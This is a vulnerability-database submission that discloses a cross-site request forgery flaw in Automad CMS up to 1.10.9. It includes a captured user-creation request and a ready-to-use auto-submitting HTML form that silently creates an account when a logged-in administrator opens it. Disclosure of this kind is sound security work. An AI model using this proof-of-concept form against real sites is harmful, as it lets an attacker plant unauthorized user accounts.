Submit #249818: Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)info

TitleAutomad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)
DescriptionAfter observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user: POST /dashboard?controller=UserCollection::createUser HTTP/1.1 Host: automad.scr User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 76 Origin: http://automad.scr Connection: close Referer: http://automad.scr/dashboard?view=System Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211 X-PwnFox-Color: green username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd CSRF HTML: <html> <body> <form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST"> <input type="hidden" name="username" value="User" /> <input type="hidden" name="email" value="User&#64;example&#46;com" /> <input type="hidden" name="password1" value="Passw0rd" /> <input type="hidden" name="password2" value="Passw0rd" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
Source⚠️ https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF)
User
 Maland (UID 59886)
Submission12/09/2023 18:15 (3 years ago)
Moderation12/21/2023 09:19 (12 days later)
StatusAccepted
VulDB entry248687 [automad up to 1.10.9 User Creation dashboard?controller=UserCollection::createUser cross-site request forgery]
Points20

Might our Artificial Intelligence support you?

Check our Alexa App!